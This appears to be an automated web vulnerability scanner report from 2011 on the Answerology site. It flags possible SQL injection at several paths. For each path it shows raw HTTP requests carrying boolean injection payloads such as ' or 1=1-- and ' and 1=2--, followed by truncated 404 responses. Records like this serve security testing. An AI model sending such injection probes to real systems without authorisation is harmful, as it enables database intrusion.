HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:43:16 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /cobrands/quickandsimple10784842'%20or%201%3d2-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmv=191590138.hearst |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:43:17 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/redbookmag |
GET /cobrands/redbookmag'%20and%201%3d1--%20/RedbookmagLayout.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:48 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cobrands/redbookmag'%20and%201%3d2--%20/RedbookmagLayout.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:49 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/redbookmag |
GET /cobrands/redbookmag Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:55 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cobrands/redbookmag Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:55 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/seventeen |
GET /cobrands21121690'%20or%201%3d1-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:49 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /cobrands21121690'%20or%201%3d2-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:50 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cssjs/CharacterCounter |
GET /cssjs'%20and%201%3d1--%20/CharacterCounter.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:32 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cssjs'%20and%201%3d2--%20/CharacterCounter.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:33 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cssjs/CoachesLayout.js |
GET /cssjs/CoachesLayout.js18708381'%20or%201%3d1-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmv=191590138.hearst |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:43:01 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cssjs/CoachesLayout.js18708381'%20or%201%3d2-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmv=191590138.hearst |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:43:01 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cssjs/countdownTimer.js |
GET /cssjs'%20and%201%3d1--%20/countdownTimer.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:40 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script 